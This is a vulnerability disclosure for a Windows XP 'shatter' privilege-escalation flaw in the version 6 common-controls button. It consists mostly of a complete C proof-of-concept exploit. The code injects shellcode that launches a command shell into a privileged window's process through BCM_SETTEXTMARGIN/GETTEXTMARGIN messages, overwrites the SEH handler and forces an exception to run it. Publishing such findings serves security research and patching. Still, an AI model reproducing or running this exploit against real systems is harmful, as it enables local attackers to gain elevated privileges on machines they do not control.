Shatter XP

[xenophi1e <oliver.lavery () sympatico ca>]

Intro
-----

        Brett Moore from Security Assesment put me onto this one. XP's Visual Styles, the feature that makes various 
controls in Windows XP look a less dated, also introduce a new shatter type vulnerability into the OS.

Vuln
-------

        Applications which have the new XPified appearance use CommCtl32.dll version 6. This DLL must be explicitly 
specified in an application's manifest, which is why many older applications do not benefit from the aesthetic 
improvements.

        In addition to making things perty, CommCtl32.dll version 6 introduces several new messages for the windows 
button control:

BCM_GETIDEALSIZE 
BCM_GETIMAGELIST 
BCM_GETTEXTMARGIN 
BCM_SETIMAGELIST 
BCM_SETTEXTMARGIN 

        The two 'TEXTMARGIN' messages have a RECT * as lParam, a pattern common to many controls which can be exploited 
using windows messages. Indeed, with some simple code it's possible to inject arbitrary instructions into an 
application using the new XP button control.

Apps
----

        Any priviledged application which uses XP visual styles and creates a window on the interactive desktop can be 
used by an attacker to gain elevated priviledges.


Exploit
-------

        The hitch here is there's no indirect way to set a button's text margin. Instead we make use of the fact that 
kernel32.dll is always at the same address and contains known bytes. Simple.

--- CUT - HERE ---


/**********************************************************
* CommCtrl 6.0 Button Shatter attack
*
* Demonstrates the use of windows messages to;
*    - inject shellcode to known location
*    - overwrite 4 bytes of a critical memory address
*
* 4 Variables need to be set for proper execution.
*    - tWindow is the title of the programs main window
*    - SEH_HANDLER_ADDR is the critical address to overwrite
*    - SHELLCODE_ADDR is the data space to inject the code
*    - KERN32_BASE_ADDR is the base address of kernel32 on your system
*
* Oliver Lavery <olavery at pivx.com>
*
* Based on (and pretty much identical to) shatterseh2.c by 
* Brett Moore [ brett moore security-assessment com ]
**********************************************************/
#include <windows.h>
#define _WIN32_WINNT 0x501
#include <commctrl.h>
#include <stdio.h>

// Local Cmd Shellcode. 
// Added a loadLibrary call to make sure msvcrt.dll is present -- ol
BYTE exploit[] = 
"\x90\x68\x74\x76\x73\x6D\x68\x63\x72\x00\x00\x54\xB9\x61\xD9\xE7\x77\xFF\xD1\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC";

char g_classNameBuf[ 256 ];

char tWindow[]="Calculator";// The name of the main window
#define SEH_HANDLER_ADDR 0x77ed73B4      // Critical Address To Overwrite

// you might want to find a less destructive spot to stick the code, but this works for me --ol
#define SHELLCODE_ADDR 0x77ed7484   // Known Writeable Space Or Global Space

// The range between these will be scanned to find our shellcode bytes.
#define KERN32_BASE_ADDR (BYTE *)0x77e61000 // Start of kernel32
#define KERN32_TOP_ADDR (BYTE *)0x77ed0000 // Not the actual top. Just where we stop looking for bytes.

void doWrite(HWND hWnd, BYTE tByte, BYTE* address);
void IterateWindows(long hWnd);
void *FindByteInKernel32( BYTE byte );


void ErrorTrace(const char *msg, DWORD error)
{
        DWORD numWritten;

        WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), msg, strlen(msg), &numWritten, NULL);
        if (error) {
                LPTSTR lpMsgBuf;

                FormatMessage( 
                        FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
                        NULL,
                        error,
                        MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language
                        (LPTSTR) &lpMsgBuf,
                        0,
                        NULL 
                );
                WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), lpMsgBuf, strlen(lpMsgBuf), &numWritten, NULL);
                // Free the buffer.
                LocalFree( lpMsgBuf );
        }
}


//"Should there be a reason to believe that code that comes from a variety
//of people, unknown from around the world, should be somehow of higher quality
//than that from people who get paid to do it professionally?"
// - Steve Ballmer

// (Hey, wait, are MS employees generally household names? 
//  Isn't MS an equal opportunity employer?)

int main(int argc, char *argv[])
{
   long hWnd;
   HMODULE hMod;
   DWORD ProcAddr;
   printf("%% Playing with CommCtrl 6.0 messages\n");
   printf("%% Oliver Lavery.\n\n");
   printf("%% based on Shatter SEH code by\n");
   printf("%% brett moore security-assessment com\n\n");

   // Find local procedure address
   hMod = LoadLibrary("kernel32.dll");
   ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA");
   if(ProcAddr != 0)
      // And put it in our shellcode
      *(long *)&exploit[13] = ProcAddr;

   hMod = LoadLibrary("msvcrt.dll");
   ProcAddr = (DWORD)GetProcAddress(hMod, "system");
   if(ProcAddr != 0)
      // And put it in our shellcode
      *(long *)&exploit[26] = ProcAddr;

   printf("+ Finding %s Window...\n",tWindow);
   hWnd = (long)FindWindow(NULL,tWindow);
   if(hWnd == NULL)
   {
      printf("+ Couldn't Find %s Window\n",tWindow);
      return 0;
   }
   printf("+ Found Main Window At...0x%xh\n",hWnd);
   IterateWindows(hWnd);
   printf("+ Not Done...\n");
   return 0;
}

void *FindByteInKernel32( BYTE byte )
{
        BYTE *addr = KERN32_BASE_ADDR;
        while ( addr < KERN32_TOP_ADDR ) {
                if ( *addr == byte ) return addr;
        addr++;
        }
        ErrorTrace( "Couldn't find a shellcode byte in kernel32. Sorry.", 0 );
        exit(0);
}

//"Should there be any reason to believe that a relatively small group of 
//paid programmers working under the direction of a marketing machine can produce
//code approaching the quality of a global team linked by the internet, whose
//every line of code is subject to ruthless peer review, and whose only standard
//is excellence?"
// - crunchie812

void doWrite(HWND hWnd, BYTE tByte, BYTE *address)
{
   void *byte_addr;
   byte_addr = FindByteInKernel32( tByte );
   SendMessage( hWnd,(UINT) BCM_SETTEXTMARGIN,0,(LPARAM)byte_addr);
   if ( !SendMessage( hWnd, (UINT)BCM_GETTEXTMARGIN, 0, (LPARAM)address) ) {
           ErrorTrace( "error", GetLastError() );
   }
}

void IterateWindows(long hWnd)
{
   long childhWnd,looper;
   childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
   GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) );
   while ( strcmp(g_classNameBuf, "Button") )
   {
//      IterateWindows(childhWnd);
      childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
          GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) );
   }

   if(childhWnd != NULL)
   {
      printf("+ Found button control..0x%xh\n",childhWnd);

      // Inject shellcode to known address
          printf("+ Sending shellcode to...0x%xh\n", SHELLCODE_ADDR);
      for (looper=0;looper<sizeof(exploit);looper++)
         doWrite((HWND)childhWnd, exploit[looper],(BYTE *)(SHELLCODE_ADDR + looper));

      // Overwrite SEH
      printf("+ Overwriting Top SEH....0x%xh\n", SEH_HANDLER_ADDR);
      doWrite((HWND)childhWnd, ((SHELLCODE_ADDR) & 0xff), (BYTE  *)SEH_HANDLER_ADDR);
      doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 8) & 0xff), (BYTE  *)SEH_HANDLER_ADDR+1);
      doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 16) & 0xff), (BYTE  *)SEH_HANDLER_ADDR+2);
      doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 24) & 0xff), (BYTE  *)SEH_HANDLER_ADDR+3);

      // Cause exception
      printf("+ Forcing Unhandled Exception\n");
      doWrite((HWND)childhWnd, 1, (BYTE *)0xDEADBEEF);
      printf("+ Done...\n");
      exit(0);
   }
}

--- CUT - HERE ---

Greets
------

        Cheers to Brett Moore for giving me something interesting to poke at.

        Props to the PivX crew.


~ol